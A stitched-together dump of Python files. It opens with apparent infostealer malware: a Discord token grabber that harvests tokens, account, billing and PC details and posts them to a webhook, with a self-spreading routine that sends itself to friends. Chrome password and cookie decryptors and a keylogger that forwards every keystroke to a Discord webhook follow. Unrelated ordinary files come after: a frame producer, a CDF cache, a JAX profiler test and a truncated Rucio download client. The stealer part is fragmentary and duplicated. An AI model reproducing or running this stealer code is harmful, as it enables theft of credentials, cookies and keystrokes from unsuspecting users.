for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
},
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
"text": f"Token grabber by Rezizt"
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Rezizt tf you doing",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request(webhook, data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
def get_master_key():
# this finds the key needed to decrypt the Local Data passwords
with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
local_state = f.read()
local_state = json.loads(local_state)
# iterate through the file and find the key which is to the right of os_crypt
master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
master_key = master_key[5:] # removing DPAPI
master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] # sqlite3 decryption
try:
return master_key # return the key in plain text
except:
exit()
def decrypt_payload(cipher, payload):
try:
return cipher.decrypt(payload)
except:
pass
def generate_cipher(aes_key, iv):
try:
return AES.new(aes_key, AES.MODE_GCM, iv)
except:
pass
def decrypt_password(buff, master_key):
try:
iv = buff[3:15]
payload = buff[15:]
cipher = generate_cipher(master_key, iv)
decrypted_pass = decrypt_payload(cipher, payload)
decrypted_pass = decrypted_pass[:-16].decode() # remove suffix bytes
try:
return decrypted_pass
except:
pass
except Exception as e:
# print("Probably saved password from Chrome version older than v80\n")
# print(str(e))
decrypted_pass = win32crypt.CryptUnprotectData(buff, None, None, None, 0) #Tuple
return str(decrypted_pass[1])
if __name__ == '__main__':
master_key = get_master_key()
login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()
try:
# grab the needed information
cursor.execute("SELECT action_url, username_value, password_value FROM logins")
# make a local file with the login data
passfile = open("passwords.txt", "w")
for r in cursor.fetchall():
# these 2 are already in plain text
url = r[0]
username = r[1]
encrypted_password = r[2]
# now decrypt the password using the master key via AES encryption / decryption
decrypted_password = decrypt_password(encrypted_password, master_key)
#print("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
# sort it and make it look more organised
passfile.write("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
# finish the files
passfile.close()
conn.close()
except Exception as e:
pass
def get_master_key():
# this finds the key needed to decrypt the Local Data passwords
with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
local_state = f.read()
local_state = json.loads(local_state)
# iterate through the file and find the key which is to the right of os_crypt
master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
master_key = master_key[5:] # removing DPAPI
master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] # sqlite3 decryption
return master_key # return the key in plain text
def decrypt_payload(cipher, payload):
return cipher.decrypt(payload)
def generate_cipher(aes_key, iv):
return AES.new(aes_key, AES.MODE_GCM, iv)
def decrypt_cookies(buff, master_key):
try:
iv = buff[3:15]
payload = buff[15:]
cipher = generate_cipher(master_key, iv)
decrypted_cook = decrypt_payload(cipher, payload)
decrypted_cook = decrypted_cook[:-16].decode() # remove suffix bytes
return decrypted_cook
except Exception as e:
# print("Probably saved password from Chrome version older than v80\n")
# print(str(e))
decrypted_cook = win32crypt.CryptUnprotectData(buff, None, None, None, 0) #Tuple
return str(decrypted_cook[1])
if __name__ == '__main__':
master_key = get_master_key()
try:
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute('SELECT encrypted_value,host_key,name FROM Cookies;')
except:
pass
try:
# grab the needed information
cursor.execute('SELECT encrypted_value,host_key,name FROM Cookies;')
# make a local file with the login data
passfile = open('cookies' + '.txt', "w")
for r in cursor.fetchall():
# these 2 are already in plain text
url = r[1]
username = r[2]
encrypted_cookies = r[0]
# now decrypt the password using the master key via AES encryption / decryption
decrypted_cookies = decrypt_cookies(encrypted_cookies, master_key)
#print("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_cookies + "\n" + "*" * 50 + "\n")
# sort it and make it look more organised
passfile.write("URL: " + url + "\nWebsite: " + username + "\nCookie: " + decrypted_cookies + "\n" + "-" * 50 + "\n")
# finish the files
passfile.close()
conn.close()
except Exception as e:
print(e)
webhook = DiscordWebhook(url=webhook, username="Passwords and cookies")
def on_press(key):
webhook = DiscordWebhook(url=ext['webhook'], content=f"| Date: {today} | KEY: {str(key)} | PC name: {pcname} |", username=ext['webhook-name'])
response = webhook.execute()
def listener_s():
with Listener(on_press=on_press) as listener:
listener.join()
# send two images
with open("cookies.txt", "rb") as f:
webhook.add_file(file=f.read(), filename='cookies.txt')
with open("passwords.txt", "rb") as f:
webhook.add_file(file=f.read(), filename='passwords.txt')
response = webhook.execute()
os.remove("cookies.txt")
os.remove("passwords.txt")
os.remove("Loginvault.db")
|
frame_producer.py
|
import logging
import queue
import sys
import threading
import time
import click
import numpy as np
import struct
from skimage import io
from os import listdir, walk
from os.path import join
from odin_data.shared_buffer_manager import SharedBufferManager, SharedBufferManagerException
from odin_data.ipc_channel import IpcChannel, IpcChannelException
from odin_data.ipc_message import IpcMessage, IpcMessageException
from .frame_producer_config import FrameProducerConfig
class FrameProducer():
def __init__(self, config_file):
# Create a configuration object with default settings, loading from a config file if
# specified
self.config = FrameProducerConfig(config_file=config_file)
# Create a logger and set up a console handler with the appropriate format
self.logger = logging.getLogger('frame_producer')
ch = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter(fmt=self.config.log_format, datefmt="%d/%m/%y %H:%M:%S")
ch.setFormatter(formatter)
self.logger.addHandler(ch)
# Set the logging level if a valid level is defined in the configuration
log_level = getattr(logging, self.config.log_level.upper(), None)
if log_level:
ch.setLevel(log_level)
self.logger.setLevel(log_level)
self.logger.info("FrameProducer starting up")
# Initialise the shared buffer manager
self.shared_buffer_manager = SharedBufferManager(
self.config.shared_buffer,
self.config.shared_mem_size,
self.config.shared_buffer_size,
remove_when_deleted=True,
boost_mmap_mode=self.config.boost_mmap_mode
)
self.logger.debug(
"Mapped shared buffer manager %s id %d with %d buffers of size %d",
self.config.shared_buffer,
self.shared_buffer_manager.get_manager_id(),
self.shared_buffer_manager.get_num_buffers(),
self.shared_buffer_manager.get_buffer_size()
)
# Create the frame ready channel and bind it to the endpoint
self.ready_channel = IpcChannel(IpcChannel.CHANNEL_TYPE_PUB)
self.ready_channel.bind(self.config.ready_endpoint)
self.logger.debug(
"Created frame ready IPC channel on endpoint %s",
self.config.ready_endpoint
)
# Create the frame release channel, bind it to the endpoint and set the default
# subscription on the channel
self.release_channel = IpcChannel(IpcChannel.CHANNEL_TYPE_SUB)
self.release_channel.bind(self.config.release_endpoint)
self.release_channel.subscribe(b'')
self.logger.debug(
"Created frame release IPC channel on endpoint %s",
self.config.release_endpoint
)
# Create the queue to contain available buffer IDs and precharge it with all available
# shared memory buffers
self.free_buffer_queue = queue.Queue()
for idx in range(self.shared_buffer_manager.get_num_buffers()):
self.free_buffer_queue.put(idx)
self.logger.debug(
"Created free buffer queue with %d buffers pre-charged",
self.free_buffer_queue.qsize()
)
# Initialise msg index counter
self._next_msg_id = 0
# Set the internal run flag to true
self._run = True
self.frame = 0
# Create a thread to handle frame release messages
self.release_thread = threading.Thread(target=self.process_release)
# Start the release channel processing thread
self.release_thread.start()
def get_next_msg_id(self):
"""Increment and return the next message ID for IPC messages."""
self._next_msg_id += 1
return self._next_msg_id
# Enumerate the data type so it can be sent in frame header
def get_dtype_enumeration(self, img_dtype):
list_of_dtypes = ["unknown", "uint8", "uint16", "uint32", "uint64", "float"]
# Is the data type contained within the odin-data enumeration list?
if img_dtype in list_of_dtypes:
enumerated_dtype = list_of_dtypes.index(img_dtype)
else:
enumerated_dtype = 0
# Return the enumerated data type
return enumerated_dtype
# Convert image from rgb to gray
def rgb2gray(self, img):
# Convert from RGB to grayscale using the ITU-R BT.601 luma weights
return np.dot(img[..., :3], [0.2989, 0.5870, 0.1140])
def run(self, frames, fps, imgs_path, camera_emulator):
try:
"""Run the frame producer main event loop."""
# Check if config from camera emulator is not None
if frames is None:
frames = self.config.frames
if fps is None:
fps = self.config.frames_per_second
if imgs_path is None:
imgs_path = self.config.testfile_path
# Allow the IPC channels to connect and then notify the frame processor of the buffer
# configuration
time.sleep(1.0)
self.notify_buffer_config()
file_list = listdir(imgs_path)
self.logger.info("Total image count: %d", len(file_list))
# Loop over the specified number of frames and transmit them
self.logger.info("Sending %d frames to processor\n", frames)
self.frame = 0
self.send_frames = True
while self.send_frames:
try:
# Frame producer code here
self.logger.debug(" ----- Beginning creation of frame %d -----\n\n", self.frame)
# Select the image for this frame, cycling through the available files
testimage = file_list[self.frame % len(file_list)]
# Load image
vals = io.imread(join(imgs_path,testimage))
# Is the image RGB or Grayscale?
if (len(vals.shape) >= 3):
# Convert to Grayscale
vals = self.rgb2gray(vals)
# Correct data type
vals = vals.astype(np.uint8)
# Debugging of image loading
self.logger.debug("The filename is " + testimage)
self.logger.debug("The first 10 frame values: " + str(vals[0][:10]))
# Pop the first free buffer off the queue
# TODO deal with empty queue??
buffer = self.free_buffer_queue.get()
# Split image shape from (x, y) into x and y
imageshape = vals.shape
imagewidth = imageshape[0]
imageheight = imageshape[1]
self.logger.debug("Width " + str(imagewidth) + " Height " + str(imageheight) + "\n")
# What is the dtype outputting
self.logger.debug("Data Type: " + str(vals.dtype))
self.logger.debug("Data Type Enumeration: " + str(self.get_dtype_enumeration(vals.dtype.name)) + "\n")
# Pack the frame header: frame number, width, height, data type enumeration and size.
# (frame_state and the frame_start_time_secs/nsecs fields of the full header definition are currently ignored.)
header = struct.pack("iiiii", self.frame, imagewidth, imageheight, self.get_dtype_enumeration(vals.dtype.name), vals.size)
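# Note: "iiiii" packs five native C ints (20 bytes on typical platforms, with no padding
# for a homogeneous int sequence); the downstream processor is expected to unpack this
# header before reading the raw uint8 pixel data that follows it in the buffer.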
# Copy the image nparray directly into the buffer as bytes
self.logger.debug("Filling frame %d into buffer %d", self.frame, buffer)
self.shared_buffer_manager.write_buffer(buffer, header + vals.tobytes())
# Notify the processor that the frame is ready in the buffer
self.notify_frame_ready(self.frame, buffer)
self.logger.debug("----- Creation of frame %d complete -----\n\n", self.frame)
# Sent frames at a set frame rate using config
time.sleep(1/fps)
# Next frame
self.frame += 1
# Are all frames sent?
if (self.frame == (frames)):
self.send_frames = False
except KeyboardInterrupt:
self.send_frames = False
# Update state of the emulator
camera_emulator.state = 2
except Exception as error:
self.send_frames = False
self.logger.warning("Error in frame producer: %s", error)
self.logger.info("Frame producer stopping")
def stop(self):
# Clear the run flag and wait for the release processing thread to terminate
self._run = False
self.release_thread.join()
self.logger.info("Frame Producer Terminating")
def process_release(self):
"""Handle buffer release notifications from the frame processor."""
self.logger.debug("Release processing thread started")
# Keep looping while the global run flag is set
while self._run:
# Poll the release channel for frame release messages with a short timeout, allowing
# this loop to 'tick'
if self.release_channel.poll(100):
release_msg = IpcMessage(from_str=self.release_channel.recv())
# Extract the message type and value fields
msg_type = release_msg.get_msg_type()
msg_val = release_msg.get_msg_val()
# Handle a frame release notification
if msg_type == 'notify' and msg_val == 'frame_release':
# Get the buffer ID and frame number from the message parameters
buffer_id = release_msg.get_param('buffer_id')
frame = release_msg.get_param("frame")
# Push the released buffer onto the free buffer queue
self.free_buffer_queue.put(buffer_id)
self.logger.debug(
"Got frame release notification for frame %d in buffer %d \n",
frame, buffer_id
)
# Handle an async buffer config request from the processor
elif msg_type == 'cmd' and msg_val == 'request_buffer_config':
self.logger.debug("Got buffer config request from processor")
self.notify_buffer_config()
# If an unexpected message is received on the release channel, just log a message
else:
self.logger.warning(
"Got unexpected IPC message on frame release channel: %s",
release_msg
)
self.logger.debug("Release processing thread terminating")
def notify_buffer_config(self):
"""Notify the processor of the current shared buffer configuration."""
self.logger.info("Notifying downstream processor of shared buffer configuration")
config_msg = IpcMessage(msg_type='notify', msg_val='buffer_config', id=self.get_next_msg_id())
config_msg.set_param('shared_buffer_name', self.config.shared_buffer)
self.ready_channel.send(config_msg.encode())
def notify_frame_ready(self, frame, buffer):
"""Notify the processor that a frame is ready in a shared buffer."""
ready_msg = IpcMessage(msg_type='notify', msg_val='frame_ready', id=self.get_next_msg_id())
ready_msg.set_param('frame', frame)
ready_msg.set_param('buffer_id', buffer)
self.ready_channel.send(ready_msg.encode())
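# Illustrative sketch of the two notifications published on the ready channel, assuming
# odin-data's JSON encoding of IpcMessage (param names are taken from the set_param calls
# above; the exact wire format is the library's and is not guaranteed here):
#   {"msg_type": "notify", "msg_val": "buffer_config", "params": {"shared_buffer_name": "..."}}
#   {"msg_type": "notify", "msg_val": "frame_ready", "params": {"frame": 0, "buffer_id": 0}}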
@click.command()
@click.option('--config', help="The path to the required yml config file.")
def main(config):
fp = FrameProducer(config)
if __name__ == "__main__":
main()
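# Example invocation (illustrative; the module lives in a package because of the relative
# import above, so the module path and config filename are placeholders):
#   python -m <package>.frame_producer --config frame_producer_config.yml
# Note that main() as written only constructs the FrameProducer; run() is invoked elsewhere,
# e.g. by a camera emulator passing frames, fps and imgs_path.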
|
CDFCache.py
|
import re
import shutil
from pathlib import Path
from datetime import datetime
import cdflib
from threading import Thread
from typing import List, Callable, Any, TypeVar, Generic, Union, Dict
from .constants import requestMaxRetries, cacheFolder, cdas
def get(
fileDescription: (
Union[Dict[str, Union[str, int]], List[Dict[str, Union[str, int]]]]
),
onDone: Callable[[bool, cdflib.cdfread.CDF], None],
onError: Callable[[Any], None],
beforeRequest: Callable[[], Any] = None,
reload: bool = False,
**kwargs
) -> None:
"""
Gets the data synchronously from the cache, or loads it asynchronously
by issuing download requests. You have to check in the calling thread
yourself whether the requests have finished!
Parameters
----------
fileDescription
Dict from CdasWS.get_data_file() with keys Name, MimeType, StartTime,
EndTime, Length and LastModified
onDone
Called when the data has been loaded either from cache (calling
thread) or from requests (new thread). The first argument is True
when the data was loaded from cache. The second argument is the
result from the responses optionally passed through processResponse
onError
Called when there is an error and gets the error as first argument
beforeRequest
Called before a request is made in the calling thread
reload
When False (default), tries to read from cache and then executes the
requests if reading failed. When True ignores the cache.
kwargs
Any remaining keyword arguments will be passed to CdasWs.download()
"""
if isinstance(fileDescription, list):
return [
get(fd, onDone, onError, beforeRequest, reload, **kwargs)
for fd in fileDescription
]
cachedFile = (
cacheFolder
+ re.search(r"/tmp/([^/]+/[^/]+)$", fileDescription["Name"]).group(1)
)
cachedFilePath = Path(cachedFile)
def load():
tempFile = None
err = False
for i in range(requestMaxRetries):
err = False
try:
tempFile = cdas.download(
fileDescription["Name"], fileDescription["Length"], **kwargs
)
break
except Exception as e:
err = e
if (err or tempFile is None) and onError:
if cachedFilePath.is_file():
cdf = None
cdfRead = False
try:
cdf = _read_del_invalid_CDF(cachedFile)
cdfRead = True
except Exception as e:
pass
if cdfRead:
onDone(True, cdf)
return
onError(err if err else tempFile)
return
if not cachedFilePath.parent.exists():
cachedFilePath.parent.mkdir()
shutil.move(tempFile, cachedFile)
cdf = None
try:
cdf = _read_del_invalid_CDF(cachedFile)
except Exception as e:
onError(e)
return
onDone(False, cdf)
if not reload:
if (cachedFilePath.is_file() and datetime.fromtimestamp(
cachedFilePath.stat().st_mtime) >= datetime.fromisoformat(
fileDescription["LastModified"].replace("Z", ""))):
cdf = None
cdfRead = False
try:
cdf = _read_del_invalid_CDF(cachedFile)
cdfRead = True
except Exception as e:
onError(e)
if cdfRead:
onDone(True, cdf)
else:
reload = True
if reload:
if cachedFilePath.is_file():
cachedFilePath.unlink()
if beforeRequest:
beforeRequest()
t = Thread(target=load)
t.daemon = True
t.start()
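# Illustrative usage sketch (the file description dict normally comes from
# CdasWs.get_data_file(); the callbacks below are hypothetical):
#
# def on_done(from_cache, cdf):
#     print("cache hit" if from_cache else "downloaded", cdf.cdf_info())
#
# get(file_description, onDone=on_done, onError=print)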
def _read_del_invalid_CDF(file: str) -> cdflib.cdfread.CDF:
try:
return _read_CDF(file)
except NotFoundError:
p = Path(file)
p.unlink()
# clean up empty folder
empty = not any(p.parent.iterdir())
if empty:
try:
p.parent.rmdir()
except OSError:
pass
raise
def _read_CDF(file: str) -> cdflib.cdfread.CDF:
try:
return cdflib.CDF(file)
except OSError as e:
if "is not a CDF file" in str(e):
with open(file, mode="r") as f:
content = f.read()
if (content.startswith(("<!DOCTYPE HTML", "<html"))
and "<title>404 Not Found</title>" in content):
raise NotFoundError(file)
raise
class NotFoundError(Exception):
"""Error raised when the CDF file was not found
Attributes:
file -- path to the file that was requested
"""
def __init__(self, file: str):
self.file = file
def __str__(self):
return "NotFoundError: File \"{}\" was not found on the server".format(
re.sub(r"^(?:\.?[\\/])?cache\b", "", self.file)
)
|
profiler_test.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import glob
import os
import shutil
import threading
import unittest
from absl.testing import absltest
import jax
import jax.numpy as jnp
import jax.profiler
from jax.config import config
import jax.test_util as jtu
try:
import portpicker
except ImportError:
portpicker = None
try:
from tensorflow.python.profiler import profiler_client
from tensorflow.python.profiler import profiler_v2 as tf_profiler
except ImportError:
profiler_client = None
tf_profiler = None
config.parse_flags_with_absl()
class ProfilerTest(unittest.TestCase):
# These tests simply test that the profiler API does not crash; they do not
# check functional correctness.
def setUp(self):
super().setUp()
self.worker_start = threading.Event()
self.profile_done = False
@unittest.skipIf(not portpicker, "Test requires portpicker")
def testStartServer(self):
port = portpicker.pick_unused_port()
jax.profiler.start_server(port=port)
del port
def testTraceContext(self):
x = 3
with jax.profiler.TraceContext("mycontext"):
x = x + 2
def testTraceFunction(self):
@jax.profiler.trace_function
def f(x):
return x + 2
self.assertEqual(f(7), 9)
@partial(jax.profiler.trace_function, name="aname")
def g(x):
return x + 2
self.assertEqual(g(7), 9)
@partial(jax.profiler.trace_function, name="aname", akwarg="hello")
def h(x):
return x + 2
self.assertEqual(h(7), 9)
def testDeviceMemoryProfile(self):
x = jnp.ones((20,)) + 7.
self.assertIsInstance(jax.profiler.device_memory_profile(), bytes)
del x
def _check_xspace_pb_exist(self, logdir):
path = os.path.join(logdir, 'plugins', 'profile', '*', '*.xplane.pb')
self.assertEqual(1, len(glob.glob(path)),
'Expected one path match: ' + path)
@unittest.skipIf(not (portpicker and profiler_client and tf_profiler),
"Test requires tensorflow.profiler and portpicker")
def testSingleWorkerSamplingMode(self, delay_ms=None):
def on_worker(port, worker_start):
# Must keep return value `server` around.
server = jax.profiler.start_server(port) # noqa: F841
worker_start.set()
x = jnp.ones((1000, 1000))
while True:
with jax.profiler.TraceContext("atracecontext"):
jnp.dot(x, x.T).block_until_ready()
if self.profile_done:
break
def on_profile(port, logdir, worker_start):
worker_start.wait()
options = tf_profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=2,
device_tracer_level=1,
delay_ms=delay_ms,
)
# Request for 1000 milliseconds of profile.
duration_ms = 1000
profiler_client.trace('localhost:{}'.format(port), logdir, duration_ms,
'', 1000, options)
self.profile_done = True
logdir = absltest.get_default_test_tmpdir()
# Remove any existing log files.
shutil.rmtree(logdir, ignore_errors=True)
port = portpicker.pick_unused_port()
thread_profiler = threading.Thread(
target=on_profile, args=(port, logdir, self.worker_start))
thread_worker = threading.Thread(
target=on_worker, args=(port, self.worker_start))
thread_worker.start()
thread_profiler.start()
thread_profiler.join()
thread_worker.join(120)
self._check_xspace_pb_exist(logdir)
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
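# Note: testSingleWorkerSamplingMode additionally requires portpicker and the TensorFlow
# profiler client; without them it is skipped (see the skipIf decorators above).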
|
downloadclient.py
|
# -*- coding: utf-8 -*-
# Copyright 2018-2022 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Tomas Javurek <tomas.javurek@cern.ch>, 2018-2021
# - Vincent Garonne <vincent.garonne@cern.ch>, 2018
# - Joaquín Bogado <jbogado@linti.unlp.edu.ar>, 2018
# - Nicolo Magini <nicolo.magini@cern.ch>, 2018-2019
# - Tobias Wegner <twegner@cern.ch>, 2018-2019
# - Martin Barisits <martin.barisits@cern.ch>, 2018-2021
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - David Cameron <david.cameron@cern.ch>, 2019
# - Gabriele Fronze' <gfronze@cern.ch>, 2019
# - Brandon White <bjwhite@fnal.gov>, 2019
# - Jaroslav Guenther <jaroslav.guenther@cern.ch>, 2019
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Eli Chadwick <eli.chadwick@stfc.ac.uk>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
# - Thomas Beermann <thomas.beermann@cern.ch>, 2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021-2022
# - Rakshita Varadarajan <rakshitajps@gmail.com>, 2021
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - Cedric Serfon <cedric.serfon@cern.ch>, 2021
# - Joel Dierkes <joel.dierkes@cern.ch>, 2021
from __future__ import division
import copy
import itertools
import logging
import os
import random
import shutil
import signal
import time
try:
from Queue import Queue, Empty, deque
except ImportError:
from queue import Queue, Empty, deque
from threading import Thread
from rucio.client.client import Client
from rucio.common.config import config_get
from rucio.common.exception import (InputValidationError, NoFilesDownloaded, NotAllFilesDownloaded, RucioException)
from rucio.common.didtype import DIDType
from rucio.common.pcache import Pcache
from rucio.common.utils import adler32, detect_client_location, generate_uuid, parse_replicas_from_string, \
send_trace, sizefmt, execute, parse_replicas_from_file, extract_scope
from rucio.common.utils import GLOBALLY_SUPPORTED_CHECKSUMS, CHECKSUM_ALGO_DICT, PREFERRED_CHECKSUM
from rucio.rse import rsemanager as rsemgr
from rucio import version
class BaseExtractionTool:
def __init__(self, program_name, useability_check_args, extract_args, logger=logging.log):
"""
Initialises an extraction tool object
:param program_name: the name of the archive extraction program, e.g., unzip
:param useability_check_args: the arguments of the extraction program to test if it is installed, e.g., --version
:param extract_args: the arguments that will be passed to the program for extraction
:param logger: optional decorated logging.log object that can be passed from the calling daemon or client.
"""
self.program_name = program_name
self.useability_check_args = useability_check_args
self.extract_args = extract_args
self.logger = logger
self.is_usable_result = None
def is_useable(self):
"""
Checks if the extraction tool is installed and usable
:returns: True if it is usable otherwise False
"""
if self.is_usable_result is not None:
return self.is_usable_result
self.is_usable_result = False
cmd = '%s %s' % (self.program_name, self.useability_check_args)
try:
exitcode, out, err = execute(cmd)
exitcode = int(exitcode)
self.logger(logging.DEBUG, '"%s" returned with exitcode %d' % (cmd, exitcode))
self.is_usable_result = (exitcode == 0)
except Exception as error:
self.logger(logging.DEBUG, 'Failed to execute: "%s"' % cmd)
self.logger(logging.DEBUG, error)
return self.is_usable_result
def try_extraction(self, archive_file_path, file_to_extract, dest_dir_path):
"""
Calls the extraction program to extract a file from an archive
:param archive_file_path: path to the archive
:param file_to_extract: file name to extract from the archive
:param dest_dir_path: destination directory where the extracted file will be stored
:returns: True on success otherwise False
"""
if not self.is_useable():
return False
args_map = {'archive_file_path': archive_file_path,
'file_to_extract': file_to_extract,
'dest_dir_path': dest_dir_path}
extract_args = self.extract_args % args_map
cmd = '%s %s' % (self.program_name, extract_args)
try:
exitcode, out, err = execute(cmd)
exitcode = int(exitcode)
self.logger(logging.DEBUG, '"%s" returned with exitcode %d' % (cmd, exitcode))
return (exitcode == 0)
except Exception as error:
self.logger(logging.DEBUG, 'Failed to execute: "%s"' % cmd)
self.logger(logging.DEBUG, error)
return False
class DownloadClient:
def __init__(self, client=None, logger=None, tracing=True, check_admin=False, check_pcache=False):
"""
Initialises the basic settings for a DownloadClient object
:param client: Optional: rucio.client.client.Client object. If None, a new object will be created.
:param logger: Optional: logging.Logger object. If None, the default logger will be used.
:param tracing: Optional: if False, no traces will be sent.
:param check_admin: Optional: if True, checks whether the account has the admin attribute and, if so, does not exclude tape replicas.
:param check_pcache: Optional: if True, pcache will be checked before downloading files.
"""
self.check_pcache = check_pcache
if not logger:
self.logger = logging.log
else:
self.logger = logger.log
self.tracing = tracing
if not self.tracing:
logger(logging.DEBUG, 'Tracing is turned off.')
self.is_human_readable = True
self.client = client if client else Client()
# if token should be used, use only JWT tokens
self.auth_token = self.client.auth_token if len(self.client.auth_token.split(".")) == 3 else None
self.client_location = detect_client_location()
self.is_tape_excluded = True
self.is_admin = False
if check_admin:
account_attributes = list(self.client.list_account_attributes(self.client.account))
for attr in account_attributes[0]:
if attr['key'] == 'admin':
self.is_admin = attr['value'] is True
break
if self.is_admin:
self.is_tape_excluded = False
logger(logging.DEBUG, 'Admin mode enabled')
self.trace_tpl = {}
self.trace_tpl['hostname'] = self.client_location['fqdn']
self.trace_tpl['localSite'] = self.client_location['site']
self.trace_tpl['account'] = self.client.account
if self.client.vo != 'def':
